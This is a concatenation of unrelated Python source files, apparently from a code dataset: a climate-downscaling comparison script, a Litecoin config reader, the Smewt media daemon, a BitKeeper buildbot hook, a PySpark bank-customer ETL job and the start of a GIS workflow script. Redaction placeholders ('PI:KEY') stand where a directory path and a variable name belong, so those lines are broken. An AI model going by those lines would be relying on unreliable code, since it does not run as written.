]\n\treturn df_slice.fn.tolist()\ndef masked_mean( fn, bounds=None ):\n\t''' get mean of the full domain since the data are already clipped \n\tmostly used for processing lots of files in parallel.'''\n\timport numpy as np\n\timport rasterio\n\t\t\n\twith rasterio.open( fn ) as rst:\n\t\tif bounds:\n\t\t\twindow = rst.window( *bounds )\n\t\telse:\n\t\t\twindow = rst.window( *rst.bounds )\n\t\tmask = (rst.read_masks( 1 ) == 0)\n\t\tarr = np.ma.masked_array( rst.read( 1, window=window ), mask=mask )\n\treturn np.mean( arr )\n\nif __name__ == '__main__':\n\timport os, glob\n\timport geopandas as gpd\n\timport numpy as np\n\timport xarray as xr\n\timport matplotlib\n\tmatplotlib.use( 'agg' )\n\tfrom matplotlib import pyplot as plt\n\tfrom pathos.mp_map import mp_map\n\timport pandas as pd\n\timport geopandas as gpd\n\t\n\t# args / set working dir\n\tbase_dir = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data'\n\tos.chdir( base_dir )\n\t# scenarios = ['rcp60', 'rcp85']\n\tscenarios = ['historical']\n\tshp_fn = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/SCTC_studyarea/Kenai_StudyArea.shp'\n\tshp = gpd.read_file( shp_fn )\n\tbounds = shp.bounds\n\n\t# models = ['5ModelAvg','CRU_TS323','GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4']\n\t# models = ['GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4']\n\tmodels = ['ts323']\n\tvariables_list = [['pr']]# ['tasmax', 'tas', 'tasmin']]#,\n\t# models = ['CRU_TS323']\n\t# begin_end_groups = [[2016,2016],[2010,2020],[2095, 2100]]\n\tbegin_end_groups = [[1916, 1916],[1950, 1960],[1995, 2000]]\n\n\tfor scenario in scenarios:\n\t\tfor variables in variables_list:\n\t\t\tfor m in models:\n\t\t\t\tfor begin, end in begin_end_groups: # not fully wired-up yet\n\t\t\t\t\tif m == 'ts323':\n\t\t\t\t\t\told_dir = 'PI:KEY'\n\t\t\t\t\t\t# begin = 1950\n\t\t\t\t\t\t# end = 1965\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tif scenario == 'historical':\n\t\t\t\t\t\t\told_dir = '/Data/Base_Data/Climate/AK_CAN_2km/historical/AR5_CMIP5_models'\n\t\t\t\t\t\t\t# begin = 1950\n\t\t\t\t\t\t\t# end = 1965\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\told_dir = '/Data/Base_Data/Climate/AK_CAN_2km/projected/AR5_CMIP5_models'\n\t\t\t\t\t\t\t# begin = 2095\n\t\t\t\t\t\t\t# end = 2100\n\n\t\t\t\t\tfigsize = (16,9)\n\t\t\t\t\tout = {}\n\t\t\t\t\tfor v in variables:\n\t\t\t\t\t\tpath = os.path.join( base_dir,'downscaled', m, scenario, v )\n\t\t\t\t\t\tprint( path )\n\t\t\t\t\t\tfiles = glob.glob( os.path.join( path, '*.tif' ) )\n\t\t\t\t\t\tfiles = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )\n\t\t\t\t\t\tout[ v ] = mp_map( masked_mean, files, nproc=4 )\n\t\t\t\t\t\tif v == 'tas' or v == 'pr':\n\t\t\t\t\t\t\tif m == 'ts323':\n\t\t\t\t\t\t\t\tpath = os.path.join( old_dir, v )\n\t\t\t\t\t\t\t\tprint( path )\n\t\t\t\t\t\t\telse:\t\n\t\t\t\t\t\t\t\tpath = os.path.join( old_dir, scenario, m, v )\n\n\t\t\t\t\t\t\tfiles = glob.glob( os.path.join( path, '*.tif' ) )\n\t\t\t\t\t\t\tfiles = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )\n\t\t\t\t\t\t\tout[ v+'_old' ] = mp_map( masked_mean, files, nproc=4 )\n\n\t\t\t\t\t\t\t# nofix\n\t\t\t\t\t\t\tpath = os.path.join( base_dir,'downscaled_pr_nofix', m, scenario, v )\n\t\t\t\t\t\t\tprint( path )\n\t\t\t\t\t\t\tfiles = glob.glob( os.path.join( path, '*.tif' ) )\n\t\t\t\t\t\t\tfiles = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) )\n\t\t\t\t\t\t\tout[ v+'_nofix' ] = mp_map( masked_mean, files, nproc=4 )\n\t\t\t\t\t\t\t\n\t\t\t\t\tplot_df = pd.DataFrame( out )\n\t\t\t\t\tplot_df.index = pd.date_range( start=str(begin), end=str(end+1), freq='M' )\n\t\t\t\t\t\n\t\t\t\t\t# sort the columns for output plotting cleanliness:\n\t\t\t\t\tif 'tas' in variables:\n\t\t\t\t\t\tcol_list = ['tasmax', 'tas_old', 'tas', 'tasmin']\n\t\t\t\t\telif 'pr' in variables:\n\t\t\t\t\t\tcol_list = ['pr', 'pr_old', 'pr_nofix']\n\t\t\t\t\t\n\t\t\t\t\tplot_df = plot_df[ col_list ] # get em in the order for plotting\n\n\t\t\t\t\tif v == 'pr':\n\t\t\t\t\t\tplot_df = plot_df.round()[['pr','pr_old']]\n\n\t\t\t\t\t# now plot the dataframe\n\t\t\t\t\tif begin == end:\n\t\t\t\t\t\ttitle = 'EPSCoR SC AOI Temp Metrics {} {} {}'.format( m, scenario, begin )\n\t\t\t\t\telse:\n\t\t\t\t\t\ttitle = 'EPSCoR SC AOI Temp Metrics {} {} {} - {}'.format( m, scenario, begin, end )\n\n\t\t\t\t\tif 'tas' in variables:\n\t\t\t\t\t\tcolors = ['red', 'black', 'blue', 'red' ]\n\t\t\t\t\telse:\n\t\t\t\t\t\tcolors = [ 'blue', 'black', 'darkred' ]\n\n\t\t\t\t\tax = plot_df.plot( kind='line', title=title, figsize=figsize, color=colors )\n\n\t\t\t\t\toutput_dir = os.path.join( base_dir, 'compare_downscaling_versions_PR_no_fix' )\n\t\t\t\t\tif not os.path.exists( output_dir ):\n\t\t\t\t\t\tos.makedirs( output_dir )\n\n\t\t\t\t\t# now plot the dataframe\n\t\t\t\t\tout_metric_fn = 'temps'\n\t\t\t\t\tif 'pr' in variables:\n\t\t\t\t\t\tout_metric_fn = 'prec'\n\n\t\t\t\t\tif begin == end:\n\t\t\t\t\t\toutput_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin ) )\n\t\t\t\t\telse:\n\t\t\t\t\t\toutput_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin, end ) )\n\t\t\t\t\tplt.savefig( output_filename, dpi=400 )\n\t\t\t\t\tplt.close()\n\n\n\n\n\n# # # PRISM TEST VERSION DIFFERENCES # # # # # # #\n# import rasterio\n# import numpy as np\n# import os, glob, itertools\n\n# base_path = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/prism/raw_prism'\n# variables = [ 'tmax', 'tmin' ]\n\n# for variable in variables:\n# \tak_olds = sorted( glob.glob( os.path.join( base_path, 'prism_raw_older', 'ak', variable, '*.asc' ) ) )\n# \tak_news = sorted( glob.glob( os.path.join( base_path, 'prism_raw_2016', 'ak', variable, '*.asc' ) ) )\n\n# \tolds = np.array([ rasterio.open( i ).read( 1 ) for i in ak_olds if '_14' not in i ])\n# \tnews = np.array([ rasterio.open( i ).read( 1 ) *.10 for i in ak_news if '_14' not in i ])\n\n# \tout = olds - news\n# \tout[ (olds == -9999.0) | (news == -9999.0) ] = 0\n\n# \tuniques = np.unique( out )\n# \tuniques[ uniques > 0.01 ]\n"", '# Copyright (c) 2010 Witchspace dummy@email.com\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the ""Software""), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n""""""\nUtilities for reading litecoin configuration files.\n""""""\n\n\ndef read_config_file(filename):\n """"""\n Read a simple ``\'=\'``-delimited config file.\n Raises :const:`IOError` if unable to open file, or :const:`ValueError`\n if an parse error occurs.\n """"""\n f = open(filename)\n try:\n cfg = {}\n for line in f:\n line = line.strip()\n if line and not line.startswith(""#""):\n try:\n (key, value) = line.split(\'=\', 1)\n cfg[key] = value\n except ValueError:\n pass # Happens when line has no \'=\', ignore\n finally:\n f.close()\n return cfg\n\n\ndef read_default_config(filename=None):\n """"""\n Read litecoin default configuration from the current user\'s home directory.\n\n Arguments:\n\n - `filename`: Path to a configuration file in a non-standard location (optional)\n """"""\n if filename is None:\n import os\n import platform\n home = os.getenv(""HOME"")\n if not home:\n raise IOError(""Home directory not defined, don\'t know where to look for config file"")\n\n if platform.system() == ""Darwin"":\n location = \'Library/Application Support/Litecoin/litecoin.conf\'\n else:\n location = \'.litecoin/litecoin.conf\'\n filename = os.path.join(home, location)\n\n elif filename.startswith(""~""):\n import os\n filename = os.path.expanduser(filename)\n\n try:\n return read_config_file(filename)\n except (IOError, ValueError):\n pass # Cannot read config file, ignore\n', '#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Smewt - A smart collection manager\n# Copyright (c) 2010 Nicolas Wack dummy@email.com\n#\n# Smewt is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# Smewt is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n\nfrom pygoo import MemoryObjectGraph, Equal, ontology\nfrom guessit.slogging import setupLogging\nfrom smewt import config\nfrom smewt.ontology import Episode, Movie, Subtitle, Media, Config\nfrom smewt.base import cache, utils, Collection\nfrom smewt.base.taskmanager import TaskManager, FuncTask\nfrom smewt.taggers import EpisodeTagger, MovieTagger\nfrom smewt.plugins.feedwatcher import FeedWatcher\nfrom threading import Timer\nimport smewt\nimport time\nimport os\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\nclass VersionedMediaGraph(MemoryObjectGraph):\n\n def __init__(self, *args, **kwargs):\n super(VersionedMediaGraph, self).__init__(*args, **kwargs)\n\n\n def add_object(self, node, recurse = Equal.OnIdentity, excluded_deps = list()):\n result = super(VersionedMediaGraph, self).add_object(node, recurse, excluded_deps)\n if isinstance(result, Media):\n result.lastModified = time.time()\n\n return result\n\n def clear_keep_config(self):\n # we want to keep our config object untouched\n tmp = MemoryObjectGraph()\n tmp.add_object(self.config)\n super(VersionedMediaGraph, self).clear()\n self.add_object(tmp.find_one(Config))\n\n def __getattr__(self, name):\n # if attr is not found and starts with an upper case letter, it might be the name\n # of one of the registered classes. In that case, return a function that would instantiate\n # such an object in this graph\n if name[0].isupper() and name in ontology.class_names():\n def inst(basenode = None, **kwargs):\n result = super(VersionedMediaGraph, self).__getattr__(name)(basenode, **kwargs)\n if isinstance(result, Media):\n result.lastModified = time.time()\n return result\n\n return inst\n\n raise AttributeError, name\n\n\n @property\n def config(self):\n try:\n return self.find_one(Config)\n except ValueError:\n return self.Config()\n\n\nclass SmewtDaemon(object):\n def __init__(self):\n super(SmewtDaemon, self).__init__()\n\n # Note: put log file in data dir instead of log dir so that it is\n # accessible through the user/ folder static view\n self.logfile = utils.path(smewt.dirs.user_data_dir, \'Smewt.log\')\n setupLogging(filename=self.logfile, with_time=True, with_thread=True)\n\n\n if smewt.config.PERSISTENT_CACHE:\n self.loadCache()\n\n # get a TaskManager for all the import tasks\n self.taskManager = TaskManager()\n\n # get our main graph DB\n self.loadDB()\n\n # get our collections: series and movies for now\n self.episodeCollection = Collection(name = \'Series\',\n # import episodes and their subtitles too\n validFiles = [ Episode.isValidEpisode,\n Subtitle.isValidSubtitle ],\n mediaTagger = EpisodeTagger,\n dataGraph = self.database,\n taskManager = self.taskManager)\n\n\n self.movieCollection = Collection(name = \'Movie\',\n # import movies and their subtitles too\n validFiles = [ Movie.isValidMovie,\n Subtitle.isValidSubtitle ],\n mediaTagger = MovieTagger,\n dataGraph = self.database,\n taskManager = self.taskManager)\n\n\n if config.REGENERATE_THUMBNAILS:\n # launch the regeneration of the thumbnails, but only after everything\n # is setup and we are able to serve requests\n Timer(3, self.regenerateSpeedDialThumbnails).start()\n\n if self.database.config.get(\'tvuMldonkeyPlugin\'):\n # load up the feed watcher\n self.feedWatcher = FeedWatcher(self)\n\n # FIXME: this should go into a plugin.init() method\n from smewt.plugins import mldonkey\n mldonkey.send_command(\'vm\')\n\n\n # do not rescan as it would be too long and we might delete some files that\n # are on an unaccessible network share or an external HDD\n self.taskManager.add(FuncTask(\'Update collections\', self.updateCollections))\n\n\n\n def quit(self):\n log.info(\'SmewtDaemon quitting...\')\n self.taskManager.finishNow()\n try:\n self.feedWatcher.quit()\n except AttributeError:\n pass\n\n self.saveDB()\n\n if smewt.config.PERSISTENT_CACHE:\n self.saveCache()\n\n log.info(\'SmewtDaemon quitting OK!\')\n\n\n def _cacheFilename(self):\n return utils.path(smewt.dirs.user_cache_dir, \'Smewt.cache\',\n createdir=True)\n\n def loadCache(self):\n cache.load(self._cacheFilename())\n\n def saveCache(self):\n cache.save(self._cacheFilename())\n\n def clearCache(self):\n cache.clear()\n cacheFile = self._cacheFilename()\n log.info(\'Deleting cache file: %s\' % cacheFile)\n try:\n os.remove(cacheFile)\n except OSError:\n pass\n\n\n def loadDB(self):\n dbfile = smewt.settings.get(\'database_file\')\n if not dbfile:\n dbfile = utils.path(smewt.dirs.user_data_dir, \'Smewt.database\',\n createdir=True)\n smewt.settings.set(\'database_file\', dbfile)\n\n log.info(\'Loading database from: %s\', dbfile)\n self.database = VersionedMediaGraph()\n try:\n self.database.load(dbfile)\n except:\n log.warning(\'Could not load database %s\', dbfile)\n\n def saveDB(self):\n dbfile = smewt.settings.get(\'database_file\')\n log.info(\'Saving database to %s\', dbfile)\n self.database.save(dbfile)\n\n def clearDB(self):\n log.info(\'Clearing database...\')\n self.database.clear_keep_config()\n self.database.save(smewt.settings.get(\'database_file\'))\n\n\n def updateCollections(self):\n self.episodeCollection.update()\n self.movieCollection.update()\n\n def rescanCollections(self):\n self.episodeCollection.rescan()\n self.movieCollection.rescan()\n\n\n def _regenerateSpeedDialThumbnails(self):\n import shlex, subprocess\n from PIL import Image\n from StringIO import StringIO\n webkit2png = (subprocess.call([\'which\', \'webkit2png\'], stdout=subprocess.PIPE) == 0)\n if not webkit2png:\n log.warning(\'webkit2png not found. please run: ""python setup.py install"" from within the 3rdparty/webkit2png folder\')\n return\n\n def gen(path, filename):\n width, height = 200, 150\n log.info(\'Creating %dx%d screenshot for %s...\' % (width, height, path))\n filename = utils.path(smewt.dirs.user_data_dir, \'speeddial\', filename, createdir=True)\n cmd = \'webkit2png -g 1000 600 ""http://localhost:6543%s""\' % path\n screenshot, _ = subprocess.Popen(shlex.split(cmd),\n stdout=subprocess.PIPE).communicate()\n im = Image.open(StringIO(screenshot))\n im.thumbnail((width, height), Image.ANTIALIAS)\n im.save(filename, ""PNG"")\n\n gen(\'/movies\', \'allmovies.png\')\n gen(\'/movies/table\', \'moviestable.png\')\n gen(\'/movies/recent\', \'recentmovies.png\')\n gen(\'/series\', \'allseries.png\')\n gen(\'/series/suggestions\', \'episodesuggestions.png\')\n gen(\'/feeds\', \'feeds.png\')\n\n def regenerateSpeedDialThumbnails(self):\n self.taskManager.add(FuncTask(\'Regenerate thumbnails\',\n self._regenerateSpeedDialThumbnails))\n', '#!/usr/local/bin/python\n#\n# BitKeeper hook script.\n#\n# svn_buildbot.py was used as a base for this file, if you find any bugs or\n# errors please email me.\n#\n# Amar Takhar dummy@email.com\n\n\n\'\'\'\n/path/to/bk_buildbot.py --repository ""$REPOS"" --revision ""$REV"" --branch \\\n"""" --bbserver localhost --bbport 9989\n\'\'\'\n\nimport commands\nimport sys\nimport os\nimport re\nif sys.version_info < (2, 6):\n import sets\n\n# We have hackish ""-d"" handling here rather than in the Options\n# subclass below because a common error will be to not have twisted in\n# PYTHONPATH; we want to be able to print that error to the log if\n# debug mode is on, so we set it up before the imports.\n\nDEBUG = None\n\nif \'-d\' in sys.argv:\n i = sys.argv.index(\'-d\')\n DEBUG = sys.argv[i+1]\n del sys.argv[i]\n del sys.argv[i]\n\nif DEBUG:\n f = open(DEBUG, \'a\')\n sys.stderr = f\n sys.stdout = f\n\n\nfrom twisted.internet import defer, reactor\nfrom twisted.python import usage\nfrom twisted.spread import pb\nfrom twisted.cred import credentials\n\n\nclass Options(usage.Options):\n optParameters = [\n [\'repository\', \'r\', None,\n ""The repository that was changed.""],\n [\'revision\', \'v\', None,\n ""The revision that we want to examine (default: latest)""],\n [\'branch\', \'b\', None,\n ""Name of the branch to insert into the branch field. (REQUIRED)""],\n [\'category\', \'c\', None,\n ""Schedular category.""],\n [\'bbserver\', \'s\', \'localhost\',\n ""The hostname of the server that buildbot is running on""],\n [\'bbport\', \'p\', 8007,\n ""The port that buildbot is listening on""]\n ]\n optFlags = [\n [\'dryrun\', \'n\', ""Do not actually send changes""],\n ]\n\n def __init__(self):\n usage.Options.__init__(self)\n\n def postOptions(self):\n if self[\'repository\'] is None:\n raise usage.error(""You must pass --repository"")\n\nclass ChangeSender:\n\n def getChanges(self, opts):\n """"""Generate and stash a list of Change dictionaries, ready to be sent\n to the buildmaster\'s PBChangeSource.""""""\n\n # first we extract information about the files that were changed\n repo = opts[\'repository\']\n print ""Repo:"", repo\n rev_arg = \'\'\n if opts[\'revision\']:\n rev_arg = \'-r""%s""\' % (opts[\'revision\'], )\n changed = commands.getoutput(""bk changes -v %s -d\':GFILE:\\\\n\' \'%s\'"" % (\n rev_arg, repo)).split(\'\\n\')\n\n # Remove the first line, it\'s an info message you can\'t remove (annoying)\n del changed[0]\n\n change_info = commands.getoutput(""bk changes %s -d\':USER:\\\\n$each(:C:){(:C:)\\\\n}\' \'%s\'"" % (\n rev_arg, repo)).split(\'\\n\')\n\n # Remove the first line, it\'s an info message you can\'t remove (annoying)\n del change_info[0]\n\n who = change_info.pop(0)\n branch = opts[\'branch\']\n message = \'\\n\'.join(change_info)\n revision = opts.get(\'revision\')\n\n changes = {\'who\': who,\n \'branch\': branch,\n \'files\': changed,\n \'comments\': message,\n \'revision\': revision}\n\n if opts.get(\'category\'):\n changes[\'category\'] = opts.get(\'category\')\n\n return changes\n\n\n def sendChanges(self, opts, changes):\n pbcf = pb.PBClientFactory()\n reactor.connectTCP(opts[\'bbserver\'], int(opts[\'bbport\']), pbcf)\n d = pbcf.login(credentials.UsernamePassword(\'change\', \'changepw\'))\n d.addCallback(self.sendAllChanges, changes)\n return d\n\n def sendAllChanges(self, remote, changes):\n dl = remote.callRemote(\'addChange\', changes)\n return dl\n\n def run(self):\n opts = Options()\n try:\n opts.parseOptions()\n if not opts[\'branch\']:\n print ""You must supply a branch with -b or --branch.""\n sys.exit(1);\n\n except usage.error, ue:\n print opts\n print ""%s: %s"" % (sys.argv[0], ue)\n sys.exit()\n\n changes = self.getChanges(opts)\n if opts[\'dryrun\']:\n for k in changes.keys():\n print ""[%10s]: %s"" % (k, changes[k])\n print ""*NOT* sending any changes""\n return\n\n d = self.sendChanges(opts, changes)\n\n def quit(*why):\n print ""quitting! because"", why\n reactor.stop()\n\n def failed(f):\n print ""FAILURE: %s"" % f\n reactor.stop()\n\n d.addErrback(failed)\n d.addCallback(quit, ""SUCCESS"")\n reactor.callLater(60, quit, ""TIMEOUT"")\n\n reactor.run()\n\n\nif __name__ == \'__main__\':\n s = ChangeSender()\n s.run()\n', '#coding=UTF-8\nfrom pyspark import SparkContext, SparkConf, SQLContext, Row, HiveContext\nfrom pyspark.sql.types import *\nfrom datetime import date, datetime, timedelta\nimport sys, re, os\n\nst = datetime.now()\nconf = SparkConf().setAppName(\'PROC_O_LNA_XDXT_CUSTOMER_INFO\').setMaster(sys.argv[2])\nsc = SparkContext(conf = conf)\nsc.setLogLevel(\'WARN\')\nif len(sys.argv) > 5:\n if sys.argv[5] == ""hive"":\n sqlContext = HiveContext(sc)\nelse:\n sqlContext = SQLContext(sc)\nhdfs = sys.argv[3]\ndbname = sys.argv[4]\n\n#处理需要使用的日期\netl_date = sys.argv[1]\n#etl日期\nV_DT = etl_date \n#上一日日期\nV_DT_LD = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8])) + timedelta(-1)).strftime(""%Y%m%d"")\n#月初日期\nV_DT_FMD = date(int(etl_date[0:4]), int(etl_date[4:6]), 1).strftime(""%Y%m%d"") \n#上月末日期\nV_DT_LMD = (date(int(etl_date[0:4]), int(etl_date[4:6]), 1) + timedelta(-1)).strftime(""%Y%m%d"")\n#10位日期\nV_DT10 = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8]))).strftime(""%Y-%m-%d"")\nV_STEP = 0\n\nO_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+\'/O_CI_XDXT_CUSTOMER_INFO/*\')\nO_CI_XDXT_CUSTOMER_INFO.registerTempTable(""O_CI_XDXT_CUSTOMER_INFO"")\n\n#任务[12] 001-01::\nV_STEP = V_STEP + 1\n#先删除原表所有数据\nret = os.system(""hdfs dfs -rm -r /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/*.parquet"")\n#从昨天备表复制一份全量过来\nret = os.system(""hdfs dfs -cp -f /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT_LD+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet"")\n\n\nF_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+\'/F_CI_XDXT_CUSTOMER_INFO/*\')\nF_CI_XDXT_CUSTOMER_INFO.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO"")\n\nsql = """"""\n SELECT A.CUSTOMERID AS CUSTOMERID \n ,A.CUSTOMERNAME AS CUSTOMERNAME \n ,A.CUSTOMERTYPE AS CUSTOMERTYPE \n ,A.CERTTYPE AS CERTTYPE \n ,A.CERTID AS CERTID \n ,A.CUSTOMERPASSWORD AS CUSTOMERPASSWORD \n ,A.INPUTORGID AS INPUTORGID \n ,A.INPUTUSERID AS INPUTUSERID \n ,A.INPUTDATE AS INPUTDATE \n ,A.REMARK AS REMARK \n ,A.MFCUSTOMERID AS MFCUSTOMERID \n ,A.STATUS AS STATUS \n ,A.BELONGGROUPID AS BELONGGROUPID \n ,A.CHANNEL AS CHANNEL \n ,A.LOANCARDNO AS LOANCARDNO \n ,A.CUSTOMERSCALE AS CUSTOMERSCALE \n ,A.CORPORATEORGID AS CORPORATEORGID \n ,A.REMEDYFLAG AS REMEDYFLAG \n ,A.DRAWFLAG AS DRAWFLAG \n ,A.MANAGERUSERID AS MANAGERUSERID \n ,A.MANAGERORGID AS MANAGERORGID \n ,A.DRAWELIGIBILITY AS DRAWELIGIBILITY \n ,A.BLACKSHEETORNOT AS BLACKSHEETORNOT \n ,A.CONFIRMORNOT AS CONFIRMORNOT \n ,A.CLIENTCLASSN AS CLIENTCLASSN \n ,A.CLIENTCLASSM AS CLIENTCLASSM \n ,A.BUSINESSSTATE AS BUSINESSSTATE \n ,A.MASTERBALANCE AS MASTERBALANCE \n ,A.UPDATEDATE AS UPDATEDATE \n ,A.FR_ID AS FR_ID \n ,V_DT AS ODS_ST_DATE \n ,\'LNA\' AS ODS_SYS_ID \n FROM O_CI_XDXT_CUSTOMER_INFO A --客户基本信息\n""""""\n\nsql = re.sub(r""\\bV_DT\\b"", ""\'""+V_DT10+""\'"", sql)\nF_CI_XDXT_CUSTOMER_INFO_INNTMP1 = sqlContext.sql(sql)\nF_CI_XDXT_CUSTOMER_INFO_INNTMP1.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO_INNTMP1"")\n\n#F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+\'/F_CI_XDXT_CUSTOMER_INFO/*\')\n#F_CI_XDXT_CUSTOMER_INFO.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO"")\nsql = """"""\n SELECT DST.CUSTOMERID --客户编号:src.CUSTOMERID\n ,DST.CUSTOMERNAME --客户名称:src.CUSTOMERNAME\n ,DST.CUSTOMERTYPE --客户类型:src.CUSTOMERTYPE\n ,DST.CERTTYPE --证件类型:src.CERTTYPE\n ,DST.CERTID --证件号:src.CERTID\n ,DST.CUSTOMERPASSWORD --客户口令:src.CUSTOMERPASSWORD\n ,DST.INPUTORGID --登记机构:src.INPUTORGID\n ,DST.INPUTUSERID --登记人:src.INPUTUSERID\n ,DST.INPUTDATE --登记日期:src.INPUTDATE\n ,DST.REMARK --备注:src.REMARK\n ,DST.MFCUSTOMERID --核心客户号:src.MFCUSTOMERID\n ,DST.STATUS --状态:src.STATUS\n ,DST.BELONGGROUPID --所属关联集团代码:src.BELONGGROUPID\n ,DST.CHANNEL --渠道:src.CHANNEL\n ,DST.LOANCARDNO --贷款卡编号:src.LOANCARDNO\n ,DST.CUSTOMERSCALE --客户规模:src.CUSTOMERSCALE\n ,DST.CORPORATEORGID --法人机构号:src.CORPORATEORGID\n ,DST.REMEDYFLAG --补登标志:src.REMEDYFLAG\n ,DST.DRAWFLAG --领取标志:src.DRAWFLAG\n ,DST.MANAGERUSERID --管户人:src.MANAGERUSERID\n ,DST.MANAGERORGID --管户机构ID:src.MANAGERORGID\n ,DST.DRAWELIGIBILITY --领取信息:src.DRAWELIGIBILITY\n ,DST.BLACKSHEETORNOT --是否黑名当客户:src.BLACKSHEETORNOT\n ,DST.CONFIRMORNOT --是否生效:src.CONFIRMORNOT\n ,DST.CLIENTCLASSN --当前客户分类:src.CLIENTCLASSN\n ,DST.CLIENTCLASSM --客户分类调整:src.CLIENTCLASSM\n ,DST.BUSINESSSTATE --存量字段标志:src.BUSINESSSTATE\n ,DST.MASTERBALANCE --单户余额:src.MASTERBALANCE\n ,DST.UPDATEDATE --更新日期:src.UPDATEDATE\n ,DST.FR_ID --法人代码:src.FR_ID\n ,DST.ODS_ST_DATE --平台日期:src.ODS_ST_DATE\n ,DST.ODS_SYS_ID --源系统代码:src.ODS_SYS_ID\n FROM F_CI_XDXT_CUSTOMER_INFO DST \n LEFT JOIN F_CI_XDXT_CUSTOMER_INFO_INNTMP1 SRC \n ON SRC.CUSTOMERID = DST.CUSTOMERID \n AND SRC.FR_ID = DST.FR_ID \n WHERE SRC.CUSTOMERID IS NULL """"""\n\nsql = re.sub(r""\\bV_DT\\b"", ""\'""+V_DT10+""\'"", sql)\nF_CI_XDXT_CUSTOMER_INFO_INNTMP2 = sqlContext.sql(sql)\ndfn=""F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet""\nPI:KEY.unionAll(F_CI_XDXT_CUSTOMER_INFO_INNTMP1)\nF_CI_XDXT_CUSTOMER_INFO_INNTMP1.cache()\nF_CI_XDXT_CUSTOMER_INFO_INNTMP2.cache()\nnrowsi = F_CI_XDXT_CUSTOMER_INFO_INNTMP1.count()\nnrowsa = F_CI_XDXT_CUSTOMER_INFO_INNTMP2.count()\nF_CI_XDXT_CUSTOMER_INFO_INNTMP2.write.save(path = hdfs + \'/\' + dfn, mode=\'overwrite\')\nF_CI_XDXT_CUSTOMER_INFO_INNTMP1.unpersist()\nF_CI_XDXT_CUSTOMER_INFO_INNTMP2.unpersist()\net = datetime.now()\nprint(""Step %d start[%s] end[%s] use %d seconds, insert F_CI_XDXT_CUSTOMER_INFO lines %d, all lines %d"") % (V_STEP, st.strftime(""%H:%M:%S""), et.strftime(""%H:%M:%S""), (et-st).seconds, nrowsi, nrowsa)\nret = os.system(""hdfs dfs -mv /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT_LD+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/"")\n#先删除备表当天数据\nret = os.system(""hdfs dfs -rm -r /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT+"".parquet"")\n#从当天原表复制一份全量到备表\nret = os.system(""hdfs dfs -cp -f /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT+"".parquet"")\n', '#!/usr/bin/python\n""""""\nCopyright (c) 2014 High-Performance Computing and GIS (HPCGIS) Laboratory. All rights reserved.\nUse of this source code is governed by a BSD-style license that can be found in the LICENSE file.\nAuthors and contributors: Eric Shook (dummy@email.com)\n""""""\n\nimport os\nimport datetime\nimport time\nimport re\nimport subprocess\nfrom Queue import Queue\n#from threading import Thread\nimport threading\nimport sys,getopt\n\n\'\'\'\nThe workflow script accepts a tasklist file, which contains a list of taskfiles.\nA task may represent a simulation of an ABM or climate model. Tasks can be run \nsimultaneously if there are no dependencies or ordered in the case of \ndependencies. Tasks may also include pre-processing or post-processing tasks.\n\'\'\'\n\n# TODO: Logging may be useful if the workflow becomes 